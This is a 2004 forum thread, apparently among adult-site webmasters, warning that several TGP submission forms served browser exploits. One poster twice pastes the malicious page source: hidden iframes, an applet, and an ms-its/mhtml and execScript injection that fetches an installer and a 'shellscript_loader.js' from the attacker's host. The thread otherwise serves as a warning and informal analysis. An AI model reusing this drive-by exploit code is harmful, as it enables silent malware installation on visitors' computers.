Attention! Exploits found on TGP submit forms! - GoFuckYourself.com

dimonka · 08-26-2004, 12:00 PM

During last 24 hours several exploits, trojans and other shit was found on following TGP submit forms:

http://www.boobzillas.com/cgi-bin/tgp/post.cgi
http://www.mythumbpics.com/cgi-bin/tgp/post.cgi
http://www.visual-porn.com/cgi-bin/tgp/post.cgi
http://www.titworld.net/cgi-bin/tgp/post.cgi
... and sexls.com

Be careful! That seems to be a bug in tgp script that allows some motherfuckers to plase exploits on pages!

Delete these TGPs from your databases ASAP!

dimonka · 08-26-2004, 12:10 PM

Bump.... seems like noone cares about viruses... let it be

sixxxthsense · 08-26-2004, 12:11 PM

we just dont use IE!

bringer · 08-26-2004, 12:12 PM

Virus Found!
Virus name: MHTMLRedir.Exploit

virii are cool

Aquarius · 08-26-2004, 12:12 PM

I noticed it today, AVG went off when I load the form.

Aquarius · 08-26-2004, 12:13 PM

Quote:

Originally posted by sixxxthsense
we just dont use IE!

I was using FireFox.

dimonka · 08-26-2004, 12:13 PM

Quote:

Originally posted by sixxxthsense
we just dont use IE!

Lot of submission tools do though...

Steve · 08-26-2004, 12:13 PM

Yeah, dont bother contacting the site owner, to let him know about it. Just delete the fuckers!

SmokeyTheBear · 08-26-2004, 12:13 PM

the exploit is http://www.vesbiz.biz/adverts/05/1.htm

johndoebob · 08-26-2004, 12:14 PM

Thanks for the warning.Does your submitter come with it's own database or do you have to add all the TGPs yourself?

SmokeyTheBear · 08-26-2004, 12:15 PM

the owners possibly dont know about this exploit and its a virus that adds the iframe to every page on the server..

dimonka · 08-26-2004, 12:15 PM

Quote:

Originally posted by johndoebob
Thanks for the warning.Does your submitter come with it's own database or do you have to add all the TGPs yourself?

We currently have about 980 TGP sites in default database for our users. Trying to keep the quality, not numbers.

SmokeyTheBear · 08-26-2004, 12:18 PM

hahahahahahahaha language="hahahahahahahahahaha">
var lang = navigator.systemLanguage;
if (lang hahahaha "ru") document.location = "home.html";
</hahahahahahahaha
<html>
hahahahahaha>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
hahahahahahahaha data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.vesbiz.biz//adverts//05//main.chm::/main.htm" type="text/x-scriptlet"></object>
<iframe src="http://www.vesbiz.biz/adverts/05/jss/installer.htm" width=1 height=1></iframe>
</body>
</html>

SmokeyTheBear · 08-26-2004, 12:20 PM

this is an old exploit. I dont think it even works anymore. Update your pc

SmokeyTheBear · 08-26-2004, 12:21 PM

<html>
<body>

hahahahahahahaha language="hahahahahahahahahaha">

function InjectedDuringRedirection(){
_showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location= "hahahahahahahahahaha:'hahahahahahahaha SRC=\\'http://www.vesbiz.biz/adverts/05/jss/shellscript_loader.js\\'><\/hahahahahahahaha'";
}

</hahahahahahahaha

hahahahahahahaha language="hahahahahahahahahaha">

setTimeout("myiframe.execScript(InjectedDuringRedi rection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRed irection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>');

</hahahahahahahaha

</body>
</html>

Basic_man · 08-26-2004, 12:21 PM

Quote:

Originally posted by dimonka
Bump.... seems like noone cares about viruses... let it be

I CARE ! Thanks mate !

Broda · 08-26-2004, 12:27 PM

Who cares. Anyone using a browser when submitting is wasting his time anyway.

And most of those sites haven't listed shit in ages, so why submit to them in the first place ;)

fr8 · 08-26-2004, 12:29 PM

Quote:

Originally posted by sixxxthsense
we just dont use IE!

Some of use dont even use windows.

Mozilla is where its at.

Dirty F · 08-26-2004, 12:30 PM

Quote:

Originally posted by bringer
Virus Found!
Virus name: MHTMLRedir.Exploit

virii are cool

Viruses.

SmokeyTheBear · 08-26-2004, 12:33 PM

Quote:

Originally posted by Broda
Who cares. Anyone using a browser when submitting is wasting his time anyway.

And most of those sites haven't listed shit in ages, so why submit to them in the first place ;)

LOL this might be a little biased since you are advertising a tgp submit service.

HandSubmits are still rocking...

BTW to those wondering. after doing a little research on that virus/exploit, i notice the page its hosted on has this on the main domain

www.vesbiz.biz

We are buy iframe traffic, 20$\1k installs
ICQ: 116995240

on each of those pages you specified has an iframe with the exploit from them in it.

SmokeyTheBear · 08-26-2004, 12:35 PM

cliff notes, contact that icq number , they put the virus/exploit on that page. ( or paying the person who is , but as there is no tracking code im assuming its him/her )

Broda · 08-26-2004, 12:37 PM

Sure, it's biased.

But seems everyone overlooks the relevency in my post.

Who the fuck gives a flying fuck about those tgps mentioned in that list?

Not one of them has listed a single submitted gallery in ages, so only an idiot would ever spend time on visiting those submit form urls ;)

SmokeyTheBear · 08-26-2004, 12:40 PM

Quote:

Originally posted by Broda

Who the fuck gives a flying fuck about those tgps mentioned in that list?

Not one of them has listed a single submitted gallery in ages, so only an idiot would ever spend time on visiting those submit form urls ;)

this is true

but let the newbs learn this themselves

Brinner · 08-26-2004, 01:10 PM

Symantec Anti-Virus.

Doctor Dre · 08-26-2004, 09:26 PM

Quote:

Originally posted by sixxxthsense
we just dont use IE!

what he said :P viva firefox

08-26-2004, 12:00 PM	#1
dimonka Confirmed User Join Date: Oct 2002 Posts: 477	Attention! Exploits found on TGP submit forms! During last 24 hours several exploits, trojans and other shit was found on following TGP submit forms: http://www.boobzillas.com/cgi-bin/tgp/post.cgi http://www.mythumbpics.com/cgi-bin/tgp/post.cgi http://www.visual-porn.com/cgi-bin/tgp/post.cgi http://www.titworld.net/cgi-bin/tgp/post.cgi ... and sexls.com Be careful! That seems to be a bug in tgp script that allows some motherfuckers to plase exploits on pages! Delete these TGPs from your databases ASAP! __________________ Find out what REBILLS are!

08-26-2004, 12:10 PM	#2
dimonka Confirmed User Join Date: Oct 2002 Posts: 477	Bump.... seems like noone cares about viruses... let it be __________________ Find out what REBILLS are!

08-26-2004, 12:12 PM	#4
bringer i have man boobies Join Date: Jul 2003 Location: van down by the river Posts: 13,082	Virus Found! Virus name: MHTMLRedir.Exploit virii are cool __________________ 333-765-551

08-26-2004, 12:13 PM	#9
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	the exploit is http://www.vesbiz.biz/adverts/05/1.htm __________________ hatisblack at yahoo.com

08-26-2004, 12:14 PM	#10
johndoebob Confirmed User Join Date: Mar 2004 Posts: 3,405	Thanks for the warning.Does your submitter come with it's own database or do you have to add all the TGPs yourself? __________________

08-26-2004, 12:11 PM	#3
sixxxthsense Confirmed User Join Date: Aug 2004 Location: Toronto Posts: 2,421	we just dont use IE!

08-26-2004, 12:12 PM	#5
Aquarius Confirmed User Join Date: May 2004 Location: Mom's basement Posts: 4,754	I noticed it today, AVG went off when I load the form.

08-26-2004, 12:13 PM	#8
Steve Confirmed User Join Date: Feb 2001 Location: USA Posts: 6,894	Yeah, dont bother contacting the site owner, to let him know about it. Just delete the fuckers!

08-26-2004, 12:15 PM	#11
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	the owners possibly dont know about this exploit and its a virus that adds the iframe to every page on the server.. __________________ hatisblack at yahoo.com

08-26-2004, 12:18 PM	#13
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	hahahahahahahaha language="hahahahahahahahahaha"> var lang = navigator.systemLanguage; if (lang hahahaha "ru") document.location = "home.html"; </hahahahahahahaha <html> hahahahahaha> <title></title> </head> <body> <applet CODE="BlackBox.class" width=1 height=1></APPLET> hahahahahahahaha data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.vesbiz.biz//adverts//05//main.chm::/main.htm" type="text/x-scriptlet"></object> <iframe src="http://www.vesbiz.biz/adverts/05/jss/installer.htm" width=1 height=1></iframe> </body> </html> __________________ hatisblack at yahoo.com

08-26-2004, 12:20 PM	#14
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	this is an old exploit. I dont think it even works anymore. Update your pc __________________ hatisblack at yahoo.com

08-26-2004, 12:21 PM	#15
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	<html> <body> hahahahahahahaha language="hahahahahahahahahaha"> function InjectedDuringRedirection(){ _showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location= "hahahahahahahahahaha:'hahahahahahahaha SRC=\\'http://www.vesbiz.biz/adverts/05/jss/shellscript_loader.js\\'><\/hahahahahahahaha'"; } </hahahahahahahaha hahahahahahahaha language="hahahahahahahahahaha"> setTimeout("myiframe.execScript(InjectedDuringRedi rection.toString())",100); setTimeout("myiframe.execScript('InjectedDuringRed irection()') ",101); document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>'); </hahahahahahahaha </body> </html> __________________ hatisblack at yahoo.com

08-26-2004, 12:27 PM	#17
Broda Confirmed User Join Date: Feb 2003 Location: CheapAssDesigns.com Posts: 1,874	Who cares. Anyone using a browser when submitting is wasting his time anyway. And most of those sites haven't listed shit in ages, so why submit to them in the first place ;) __________________ CheapAssDesigns.com - when you need quality designs at affordable prices. icq: 230-729-205 info \|at\| cheap ass designs dot com

08-26-2004, 12:35 PM	#21
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	cliff notes, contact that icq number , they put the virus/exploit on that page. ( or paying the person who is , but as there is no tracking code im assuming its him/her ) __________________ hatisblack at yahoo.com

08-26-2004, 12:37 PM	#22
Broda Confirmed User Join Date: Feb 2003 Location: CheapAssDesigns.com Posts: 1,874	Sure, it's biased. But seems everyone overlooks the relevency in my post. Who the fuck gives a flying fuck about those tgps mentioned in that list? Not one of them has listed a single submitted gallery in ages, so only an idiot would ever spend time on visiting those submit form urls ;) __________________ CheapAssDesigns.com - when you need quality designs at affordable prices. icq: 230-729-205 info \|at\| cheap ass designs dot com

08-26-2004, 01:10 PM	#24
Brinner Confirmed User Join Date: Jul 2004 Location: Dirty South Posts: 303	Symantec Anti-Virus. __________________